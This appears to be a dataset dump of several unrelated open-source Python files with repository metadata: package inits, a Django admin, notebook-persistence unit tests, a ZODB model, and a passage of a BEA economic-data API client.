[
"MIT"
] | null | null | null |
bindings/pydeck-carto/pydeck_carto/__init__.py
|
ehtick/deck.gl
|
ac59a28a6ff03000072f11c9a5520eb87f11944c
|
[
"MIT"
] | null | null | null |
from ._version import __version__
from .layer import register_carto_layer
from .credentials import load_carto_credentials
__all__ = ["__version__", "load_carto_credentials", "register_carto_layer"]
| 33.166667
| 75
| 0.839196
| 24
| 199
| 6.083333
| 0.375
| 0.178082
| 0.246575
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090452
| 199
| 5
| 76
| 39.8
| 0.80663
| 0
| 0
| 0
| 0
| 0
| 0.266332
| 0.110553
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
92d3a49cf9aaff83c2c0f9c4fe08a7917c192b39
| 130
|
py
|
Python
|
odziez/orders/admin.py
|
szymanskirafal/odziez
|
029d20da0474a0380e8383f9f89c1072666c5399
|
[
"MIT"
] | null | null | null |
odziez/orders/admin.py
|
szymanskirafal/odziez
|
029d20da0474a0380e8383f9f89c1072666c5399
|
[
"MIT"
] | null | null | null |
odziez/orders/admin.py
|
szymanskirafal/odziez
|
029d20da0474a0380e8383f9f89c1072666c5399
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Order
@admin.register(Order)
class OrderAdmin(admin.ModelAdmin):
pass
| 14.444444
| 35
| 0.776923
| 17
| 130
| 5.941176
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146154
| 130
| 8
| 36
| 16.25
| 0.90991
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 5
|
132b08ebede269ef32c2443c13ad4eb5564eb44b
| 112
|
py
|
Python
|
env/lib/python3.6/site-packages/Levenshtein/__init__.py
|
anthowen/duplify
|
846d01c1b21230937fdf0281b0cf8c0b08a8c24e
|
[
"MIT"
] | 5
|
2016-03-28T20:29:44.000Z
|
2018-01-15T17:48:22.000Z
|
env/lib/python3.6/site-packages/Levenshtein/__init__.py
|
anthowen/duplify
|
846d01c1b21230937fdf0281b0cf8c0b08a8c24e
|
[
"MIT"
] | 9
|
2016-03-18T01:07:40.000Z
|
2016-06-15T21:17:08.000Z
|
env/lib/python3.6/site-packages/Levenshtein/__init__.py
|
anthowen/duplify
|
846d01c1b21230937fdf0281b0cf8c0b08a8c24e
|
[
"MIT"
] | 3
|
2016-01-09T13:51:10.000Z
|
2017-11-06T13:34:03.000Z
|
from Levenshtein import _levenshtein
from Levenshtein._levenshtein import *
__doc__ = _levenshtein.__doc__
| 22.4
| 38
| 0.821429
| 11
| 112
| 7.363636
| 0.363636
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 112
| 4
| 39
| 28
| 0.84375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
137b2e857aeba6a0c59e4b46b0fffd2953ab5977
| 109
|
py
|
Python
|
libpycr/builtin/changes/__init__.py
|
JcDelay/pycr
|
f729e003473b421b76bc49c5d55d06d7086d63cc
|
[
"Apache-2.0"
] | 1
|
2015-03-12T10:34:38.000Z
|
2015-03-12T10:34:38.000Z
|
libpycr/builtin/changes/__init__.py
|
JcDelay/pycr
|
f729e003473b421b76bc49c5d55d06d7086d63cc
|
[
"Apache-2.0"
] | null | null | null |
libpycr/builtin/changes/__init__.py
|
JcDelay/pycr
|
f729e003473b421b76bc49c5d55d06d7086d63cc
|
[
"Apache-2.0"
] | null | null | null |
"""git-cl builtins"""
import libpycr.builtin.util
__all__ = tuple(libpycr.builtin.util.find_all(__file__))
| 18.166667
| 56
| 0.761468
| 15
| 109
| 4.933333
| 0.733333
| 0.378378
| 0.486486
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082569
| 109
| 5
| 57
| 21.8
| 0.74
| 0.137615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
1393b486ac4b2ba1dbf6fe0a126f6541fd6ff7a7
| 12,767
|
py
|
Python
|
civis_jupyter_notebooks/tests/test_platform_persistence.py
|
civisanalytics/civis-jupyter-notebook
|
16e3fb804c53e7e146aeebe0cc56192ad51dc668
|
[
"BSD-3-Clause"
] | 1
|
2020-05-20T10:17:32.000Z
|
2020-05-20T10:17:32.000Z
|
civis_jupyter_notebooks/tests/test_platform_persistence.py
|
civisanalytics/civis-jupyter-notebook
|
16e3fb804c53e7e146aeebe0cc56192ad51dc668
|
[
"BSD-3-Clause"
] | 26
|
2017-09-08T20:59:00.000Z
|
2021-08-23T19:42:22.000Z
|
civis_jupyter_notebooks/tests/test_platform_persistence.py
|
civisanalytics/civis-jupyter-notebook
|
16e3fb804c53e7e146aeebe0cc56192ad51dc668
|
[
"BSD-3-Clause"
] | 4
|
2017-09-13T20:44:09.000Z
|
2020-01-22T21:24:53.000Z
|
import os
import subprocess
import nbformat
import requests
import unittest
from unittest.mock import ANY, MagicMock, patch
import logging
from civis_jupyter_notebooks import platform_persistence
from civis_jupyter_notebooks.platform_persistence import NotebookManagementError
TEST_NOTEBOOK_PATH = '/path/to/notebook.ipynb'
TEST_PLATFORM_OBJECT_ID = '1914'
SAMPLE_NOTEBOOK = open(os.path.join(os.path.dirname(__file__), 'fixtures/sample_notebook.ipynb')).read()
SAMPLE_NEW_NOTEBOOK = open(os.path.join(os.path.dirname(__file__), 'fixtures/sample_new_notebook.ipynb')).read()
class NotebookWithoutNewFlag(nbformat.NotebookNode):
""" Helper that tests if a NotebookNode has the metadata.civis.new_notebook flag set to True """
def __eq__(self, other):
return not other.get('metadata', {}).get('civis', {}).get('new_notebook', False)
class PlatformPersistenceTest(unittest.TestCase):
def setUp(self):
os.environ['CIVIS_API_KEY'] = 'hi mom'
os.environ['PLATFORM_OBJECT_ID'] = TEST_PLATFORM_OBJECT_ID
logging.disable(logging.INFO)
@patch('os.makedirs')
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis.APIClient')
@patch('civis_jupyter_notebooks.platform_persistence.requests.get')
def test_initialize_notebook_will_get_nb_from_platform(self, rg, _client, _op, _makedirs):
rg.return_value = MagicMock(spec=requests.Response, status_code=200, content=SAMPLE_NOTEBOOK)
platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH)
platform_persistence.get_client().notebooks.get.assert_called_with(TEST_PLATFORM_OBJECT_ID)
@patch('os.makedirs')
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis_jupyter_notebooks.platform_persistence.__pull_and_load_requirements')
@patch('civis.APIClient')
@patch('civis_jupyter_notebooks.platform_persistence.requests.get')
def test_initialize_notebook_will_pull_nb_from_url(self, rg, _client, requirements, _op, _makedirs):
url = 'http://whatever'
rg.return_value = MagicMock(spec=requests.Response, status_code=200, content=SAMPLE_NOTEBOOK)
platform_persistence.get_client().notebooks.get.return_value.notebook_url = url
platform_persistence.get_client().notebooks.get.return_value.requirements_url = None
platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH)
rg.assert_called_with(url)
requirements.assert_not_called()
@patch('os.makedirs')
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis.APIClient')
@patch('civis_jupyter_notebooks.platform_persistence.requests.get')
def test_initialize_notebook_will_throw_error_on_nb_pull(self, rg, _client, _op, _makedirs):
rg.return_value = MagicMock(spec=requests.Response, status_code=500, response={})
self.assertRaises(NotebookManagementError,
lambda: platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH))
@patch('nbformat.write')
@patch('os.makedirs')
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis.APIClient')
@patch('civis_jupyter_notebooks.platform_persistence.requests.get')
def test_initialize_notebook_will_set_new_notebook_flag_to_false(self, rg, _client, _op, _makedirs, nbwrite):
rg.return_value = MagicMock(spec=requests.Response, status_code=200, content=SAMPLE_NEW_NOTEBOOK)
platform_persistence.get_client().notebooks.get.return_value.notebooks_url = 'something'
platform_persistence.get_client().notebooks.get.return_value.requirements_url = None
platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH)
nbwrite.assert_called_with(NotebookWithoutNewFlag(), ANY)
@patch('os.path.isfile')
@patch('nbformat.write')
@patch('os.makedirs')
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis.APIClient')
@patch('civis_jupyter_notebooks.platform_persistence.requests.get')
def test_initialize_notebook_will_use_s3_notebook_if_not_new_and_git_notebook_exists(self, rg, _client, _op,
_makedirs, nbwrite, isfile):
rg.return_value = MagicMock(spec=requests.Response, status_code=200, content=SAMPLE_NOTEBOOK)
platform_persistence.get_client().notebooks.get.return_value.notebooks_url = 'something'
platform_persistence.get_client().notebooks.get.return_value.requirements_url = None
isfile.return_value = True
platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH)
nbwrite.assert_called_with(ANY, ANY)
@patch('os.path.isfile')
@patch('nbformat.write')
@patch('os.makedirs')
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis.APIClient')
@patch('civis_jupyter_notebooks.platform_persistence.requests.get')
def test_initialize_notebook_will_discard_s3_notebook_if_new_and_git_notebook_exists(self, rg, _client, _op,
_makedirs, nbwrite, isfile):
rg.return_value = MagicMock(spec=requests.Response, status_code=200, content=SAMPLE_NEW_NOTEBOOK)
platform_persistence.get_client().notebooks.get.return_value.notebooks_url = 'something'
platform_persistence.get_client().notebooks.get.return_value.requirements_url = None
isfile.return_value = True
platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH)
nbwrite.assert_not_called()
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis.APIClient')
@patch('os.makedirs')
@patch('civis_jupyter_notebooks.platform_persistence.requests.get')
def test_initialize_notebook_will_create_directories_if_needed(self, rg, makedirs, _client, _op):
rg.return_value = MagicMock(spec=requests.Response, status_code=200, content=SAMPLE_NOTEBOOK)
platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH)
directory = os.path.dirname(TEST_NOTEBOOK_PATH)
makedirs.assert_called_with(directory)
@patch('os.makedirs')
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis_jupyter_notebooks.platform_persistence.__pull_and_load_requirements')
@patch('civis.APIClient')
@patch('civis_jupyter_notebooks.platform_persistence.requests.get')
def test_initialize_notebook_will_pull_requirements(self, rg, _client, requirements, _op, _makedirs):
url = 'http://whatever'
rg.return_value = MagicMock(spec=requests.Response, status_code=200, content=SAMPLE_NOTEBOOK)
platform_persistence.get_client().notebooks.get.return_value.requirements_url = url
platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH)
requirements.assert_called_with(url, TEST_NOTEBOOK_PATH)
@patch('os.makedirs')
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis_jupyter_notebooks.platform_persistence.__pull_and_load_requirements')
@patch('civis.APIClient')
@patch('civis_jupyter_notebooks.platform_persistence.requests.get')
def test_initialize_notebook_will_error_on_requirements_pull(self, rg, _client, _requirements, _op, _makedirs):
url = 'http://whatever'
rg.return_value = MagicMock(spec=requests.Response, status_code=500)
platform_persistence.get_client().notebooks.get.return_value.requirements_url = url
self.assertRaises(NotebookManagementError,
lambda: platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH))
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis_jupyter_notebooks.platform_persistence.check_call')
@patch('civis.APIClient')
@patch('requests.put')
def test_post_save_fetches_urls_from_api(self, _rput, client, _ccc, _op):
platform_persistence.post_save({'type': 'notebook'}, '', {})
platform_persistence.get_client().notebooks.list_update_links.assert_called_with(TEST_PLATFORM_OBJECT_ID)
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis_jupyter_notebooks.platform_persistence.check_call')
@patch('civis.APIClient')
@patch('requests.put')
@patch('civis_jupyter_notebooks.platform_persistence.save_notebook')
def test_post_save_performs_two_put_operations(self, save, rput, _client, _ccc, _op):
platform_persistence.post_save({'type': 'notebook'}, '', {})
self.assertTrue(save.called)
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis_jupyter_notebooks.platform_persistence.check_call')
@patch('civis.APIClient')
@patch('requests.put')
@patch('civis_jupyter_notebooks.platform_persistence.save_notebook')
@patch('civis_jupyter_notebooks.platform_persistence.get_update_urls')
def test_post_save_skipped_for_non_notebook_types(self, guu, save, _rput, _client, _ccc, _op):
platform_persistence.post_save({'type': 'blargggg'}, '', {})
self.assertFalse(guu.called)
self.assertFalse(save.called)
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis_jupyter_notebooks.platform_persistence.check_call')
@patch('civis.APIClient')
@patch('requests.put')
def test_post_save_generates_preview(self, _rput, _client, check_call, _op):
platform_persistence.post_save({'type': 'notebook'}, 'x/y', {})
check_call.assert_called_with(['jupyter', 'nbconvert', '--to', 'html', 'y'], cwd='x')
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis_jupyter_notebooks.platform_persistence.check_call')
@patch('civis.APIClient')
@patch('requests.put')
def test_generate_preview_throws_error_on_convert(self, _rput, _client, check_call, _op):
check_call.side_effect = subprocess.CalledProcessError('foo', 255)
self.assertRaises(NotebookManagementError,
lambda: platform_persistence.generate_and_save_preview('http://notebook_url_in_s3', 'os/path'))
check_call.assert_called_with(['jupyter', 'nbconvert', '--to', 'html', 'path'], cwd='os')
@patch('civis.APIClient')
def test_will_regenerate_api_client(self, mock_client):
platform_persistence.get_client()
mock_client.assert_called_with()
@patch('os.path.isfile')
@patch('os.path.isdir')
@patch('civis_jupyter_notebooks.platform_persistence.pip_install')
def test_find_and_install_requirements_calls_pip_install(self, pip_install, isdir, isfile):
os.path.isdir.return_value = True
os.path.isfile.return_value = True
platform_persistence.find_and_install_requirements('/root/work/foo')
pip_install.assert_called_with('/root/work/foo/requirements.txt')
@patch('os.path.isfile')
@patch('os.path.isdir')
@patch('civis_jupyter_notebooks.platform_persistence.pip_install')
def test_find_and_install_requirements_searches_tree(self, pip_install, isdir, isfile):
os.path.isdir.return_value = True
os.path.isfile.side_effect = [False, True]
platform_persistence.find_and_install_requirements('/root/work/foo')
pip_install.assert_called_with('/root/work/requirements.txt')
@patch('os.path.isfile')
@patch('os.path.isdir')
@patch('civis_jupyter_notebooks.platform_persistence.pip_install')
def test_find_and_install_requirements_excludes_root(self, pip_install, isdir, isfile):
os.path.isdir.return_value = True
os.path.isfile.return_value = True
platform_persistence.find_and_install_requirements('/root')
pip_install.assert_not_called()
@patch('subprocess.check_output')
@patch('sys.executable')
def test_pip_install_calls_subprocess(self, executable, check_output):
platform_persistence.pip_install('/path/requirements.txt')
check_output.assert_called_with(
[executable, '-m', 'pip', 'install', '-r', '/path/requirements.txt'],
stderr=subprocess.STDOUT
)
@patch('subprocess.check_output')
@patch('sys.executable')
def test_pip_install_failure_raises_notebookmanagementerror(self, executable, check_output):
check_output.side_effect = subprocess.CalledProcessError(returncode=1, cmd='cmd', output=b'installation error')
with self.assertRaisesRegex(NotebookManagementError, 'installation error'):
platform_persistence.pip_install('/path/requirements.txt')
if __name__ == '__main__':
unittest.main()
| 54.097458
| 121
| 0.746064
| 1,496
| 12,767
| 5.96992
| 0.120321
| 0.151047
| 0.091703
| 0.12339
| 0.777293
| 0.772814
| 0.743366
| 0.728026
| 0.719964
| 0.701041
| 0
| 0.003485
| 0.145845
| 12,767
| 235
| 122
| 54.32766
| 0.815497
| 0.006893
| 0
| 0.614634
| 0
| 0
| 0.254992
| 0.181043
| 0
| 0
| 0
| 0
| 0.112195
| 1
| 0.107317
| false
| 0
| 0.043902
| 0.004878
| 0.165854
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
13aaf17d5a9e12bae05995db35d9c886f2eb404a
| 315
|
py
|
Python
|
zodb/model.py
|
thinkle/snippets
|
a19fd709fc618cee9d76b7481b834c3e0d4ed397
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
zodb/model.py
|
thinkle/snippets
|
a19fd709fc618cee9d76b7481b834c3e0d4ed397
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
zodb/model.py
|
thinkle/snippets
|
a19fd709fc618cee9d76b7481b834c3e0d4ed397
|
[
"BSD-2-Clause-FreeBSD"
] | 1
|
2019-08-28T22:06:53.000Z
|
2019-08-28T22:06:53.000Z
|
import persistent
class Model(persistent.Persistent):
def __init__(self, data):
self.data = data
self.__private = data
def private(self):
return self.__private
@property
def x(self):
return self.data
@x.setter
def x(self, data):
self.data = data
| 16.578947
| 35
| 0.596825
| 38
| 315
| 4.736842
| 0.342105
| 0.222222
| 0.133333
| 0.177778
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.311111
| 315
| 18
| 36
| 17.5
| 0.829493
| 0
| 0
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.307692
| false
| 0
| 0.076923
| 0.153846
| 0.615385
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
13ac50a584ec16e8fcdb0af8c574ae3956a159d5
| 77,643
|
py
|
Python
|
datapungibea/drivers.py
|
jjotterson/beafullfetchpy
|
47d492f79e620ad967593982887d9428756cd63b
|
[
"MIT"
] | 13
|
2019-09-24T16:32:40.000Z
|
2021-09-27T08:40:24.000Z
|
datapungibea/drivers.py
|
jjotterson/beafullfetchpy
|
47d492f79e620ad967593982887d9428756cd63b
|
[
"MIT"
] | 3
|
2020-12-08T22:16:56.000Z
|
2020-12-24T20:40:30.000Z
|
datapungibea/drivers.py
|
jjotterson/beafullfetchpy
|
47d492f79e620ad967593982887d9428756cd63b
|
[
"MIT"
] | 2
|
2019-11-05T23:30:23.000Z
|
2020-12-17T23:41:04.000Z
|
import pandas as pd
import requests
import json
from copy import deepcopy
import pyperclip
import math
import re
from datetime import datetime
from datapungibea import generalSettings
from datapungibea import vintage as vintageFns
from datapungibea import utils
from datapungibea.config import CFGnipaSummary
# (1) Auxiliary functions ######################################################
def _getBaseRequest(baseRequest={},connectionParameters={},userSettings={}):
'''
Write a base request. This is the information that gets used in most requests such as getting the userKey
'''
if baseRequest =={}:
connectInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
return(connectInfo.baseRequest)
else:
return(baseRequest)
def _getBaseCode(codeEntries):
'''
The base format of a code that can be used to replicate a driver using Requests directly.
'''
userSettings = utils.getUserSettings()
pkgConfig = utils.getPkgConfig()
storagePref = userSettings['ApiKeysPath'].split('.')[-1]
passToCode = {'ApiKeyLabel':userSettings["ApiKeyLabel"], "url":pkgConfig['url'], 'ApiKeysPath':userSettings['ApiKeysPath']}
if storagePref == 'json':
code = '''
import requests
import json
import pandas as pd
# json file should contain: {{"BEA":{{"key":"YOUR KEY","url": "{url}" }}}}
apiKeysFile = '{ApiKeysPath}'
with open(apiKeysFile) as jsonFile:
apiInfo = json.load(jsonFile)
url,key = apiInfo['{ApiKeyLabel}']['url'], apiInfo['{ApiKeyLabel}']['key']
'''.format(**passToCode)
if storagePref == 'env':
code = '''
import requests
import os
import pandas as pd
url = "{url}"
key = os.getenv("{ApiKeyLabel}")
'''.format(**passToCode)
if storagePref == 'yaml':
code = '''
import requests
import yaml
import pandas as pd
apiKeysFile = '{ApiKeysPath}'
with open(apiKeysFile, 'r') as stream:
apiInfo= yaml.safe_load(stream)
url,key = apiInfo['{ApiKeyLabel}']['url'], apiInfo['{ApiKeyLabel}']['key']
'''.format(**passToCode)
return(code)
def _getCode(query,userSettings={},pandasCode=""):
#general code to all drivers:
try:
url = query['url']
if not userSettings: #if userSettings is empty dict
apiKeyPath = generalSettings.getGeneralSettings( ).userSettings['ApiKeysPath']
else:
apiKeyPath = userSettings['ApiKeysPath']
except:
url = " incomplete connection information "
apiKeyPath = " incomplete connection information "
baseCode = _getBaseCode([url,apiKeyPath])
#specific code to this driver:
queryClean = deepcopy(query)
queryClean['url'] = 'url'
queryClean['params']['UserID'] = 'key'
queryCode = '''
query = {}
retrivedData = requests.get(**query)
{} #replace json by xml if this is the request format
'''.format(json.dumps(queryClean),pandasCode)
queryCode = queryCode.replace('"url": "url"', '"url": url')
queryCode = queryCode.replace('"UserID": "key"', '"UserID": key')
return(baseCode + queryCode)
def _clipcode(self):
'''
Copy the string to the user's clipboard (windows only)
'''
try:
pyperclip.copy(self._lastLoad['code'])
except:
print("Loaded session does not have a code entry. Re-run with verbose option set to True. eg: v.drivername(...,verbose=True)")
# (2) Drivers ###################################################################
class getDatasetlist():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings) #TODO: could just pass the output of _connectionInfo here.
self._lastLoad = {} #data stored here to assist functions such as clipcode
def datasetlist(self,params = {},verbose=False):
'''
Get the list of available datasets in the BEA API.
Sample run -
datasetlist()
Args:
verbose (bool): if returns that data in a pandas dataframe format or all available information; default to False
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
query = deepcopy(self._baseRequest)
query['params'].update({'method':'GETDATASETLIST'})
retrivedData = requests.get(**query)
df_output = self._cleanOutput(query,retrivedData)
if verbose == False:
self._lastLoad = df_output
return(df_output)
else:
code = _getCode(query,self._connectionInfo.userSettings,self._cleanCode)
output = dict(dataFrame = df_output, request = retrivedData, code = code)
self._lastLoad = output
return(output)
def _cleanOutput(self,query,retrivedData):
if query['params']['ResultFormat'] == 'JSON':
self._cleanCode = "df_output = pd.DataFrame( retrivedData.json()['BEAAPI']['Results']['Dataset'] )"
df_output = pd.DataFrame( retrivedData.json()['BEAAPI']['Results']['Dataset'] )
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
except:
pass
else:
self._cleanCode = "pd.DataFrame( retrivedData.json()['BEAAPI']['Results']['Dataset'] )"
df_output = pd.DataFrame( retrivedData.xml()['BEAAPI']['Results']['Dataset'] ) #TODO: check this works
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
except:
pass
return(df_output)
def clipcode(self):
_clipcode(self)
def _driverMetadata(self):
self.metadata = [{
"displayName":"List of Datasets",
"method" :"datasetlist", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getNIPA():
'''
rest
'''
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
def NIPA(self,
tableName,
frequency = 'Q',
year = 'X',
payload = {'method': 'GETDATA', 'DATABASENAME': 'NIPA', 'datasetname': 'NIPA', 'ParameterName': 'TableID'},
outputFormat = "tablePretty",
verbose = False,
includeIndentations = True
):
'''
Get National Income and Product Account (NIPA) data. Most parameters are set to deafault values; passing
tableName will return a value of quarterly data in all available years. Sample run -
NIPA('T10101')
NIPA('T10101', frequency = 'A', year='X',verbose=True,includeIndentation=False)
Args:
tableName (str): name of NIPA table, for example T10101
frequency (str): frequency of data - Annual (A), quarterly (Q) or monthly (M); default to Q
year (str): specific year or X for all years - eg, '2019' or 'X'; default to X
payload (dict): this is the base request information of a BEA NIPA query; default - {'method': 'GETDATA', 'DATABASENAME': 'NIPA', 'datasetname': 'NIPA', 'ParameterName': 'TableID'}
outputFormat (str): tablePretty will clean up data and return pandas of variable by date; else returns table of (variable,date) by data; default to tablePretty
verbose (bool): If false just return a pandas table; else return table, the request result and the code used; default to False
includeIndentations (bool): API does not include indentation of the table, indicate if should include it; default to True
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
# TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
# load user preferences defined in userSettings, use suggested parameters, override w fun entry
query = deepcopy(self._baseRequest)
query['params'].update({'TABLENAME': tableName})
query['params'].update({'FREQUENCY':frequency})
query['params'].update({'YEAR':year})
query['params'].update(payload)
# TODO: try loading different frenquencies if no return
#
retrivedData = requests.get(**query)
output = self._cleanOutput(query,retrivedData,outputFormat,includeIndentations) #a dict of a df or df and meta (tablePretty)
if verbose == False:
self._lastLoad = output['dataFrame']
return(self._lastLoad)
else:
output['code'] = _getCode(query,self._connectionInfo.userSettings,self._cleanCode)
output['request'] = retrivedData
self._lastLoad = output
return(output)
def _cleanOutput(self,query,retrivedData, outputFormat,includeIndentations):
if query['params']['ResultFormat'] == 'JSON':
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
except:
pass
else:
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data']) #TODO: check this works
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
except:
pass
output = {'dataFrame':df_output}
if outputFormat == "tablePretty":
df_output['LineNumber'] = pd.to_numeric(df_output['LineNumber'])
df_output['DataValue'] = pd.to_numeric(df_output['DataValue'].apply(lambda x: x.replace(',','')))
meta = df_output.drop(['DataValue', 'TimePeriod'], axis=1).drop_duplicates()
meta = meta.set_index(['LineNumber', 'SeriesCode', 'LineDescription']).reset_index()
df_output = df_output[['LineNumber', 'SeriesCode', 'LineDescription', 'DataValue', 'TimePeriod']]
df_output = pd.pivot_table(df_output, index=['LineNumber', 'SeriesCode', 'LineDescription'], columns='TimePeriod', values='DataValue', aggfunc='first')
df_output = self._includeIndentations(df_output,query['params']['TABLENAME'],includeIndentations)
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
except:
pass
output = {'dataFrame':df_output,'metadata':meta}
#update the code string:
self._cleanCode = self._cleanCode + "\ndf_output['LineNumber'] = pd.to_numeric(df_output['LineNumber']) \n"
self._cleanCode = self._cleanCode + "df_output['DataValue'] = pd.to_numeric(df_output['DataValue'].apply(lambda x: x.replace(',',''))) \n"
self._cleanCode = self._cleanCode + "df_output = df_output[['LineNumber', 'SeriesCode', 'LineDescription', 'DataValue', 'TimePeriod']] \n"
self._cleanCode = self._cleanCode + "df_output = pd.pivot_table(df_output, index=['LineNumber', 'SeriesCode', 'LineDescription'], columns='TimePeriod', values='DataValue', aggfunc='first') \n"
#if includeIndentations:
#self._cleanCode = self._cleanCode + '\n#Including indentations:'
#self._cleanCode = self._cleanCode + '\nimport datapungibea as dpb \ndata = dpb.data() \ndf_output = data.getNIPA._includeIndentations(df_output,"'+query['params']['TABLENAME']+'")\n'
#self._cleanCode = self._cleanCode + '#can get all indentations running: from datapungibea.config.CFGindentations import indentations as cfgIndentations \n'
return(output)
def _includeIndentations(self,df_output,tableName,includeIndentations=True): #tableName = query['params']['TABLENAME']
if not includeIndentations:
return(df_output)
from datapungibea.config.CFGindentations import indentations as cfgIndentations #TODO: move this to __int__
cfgCases = list(filter(lambda x: tableName in x['tableName'], cfgIndentations))
if len(cfgCases) < 1:
return(df_output)
else:
try:
indentTable = cfgCases[0]
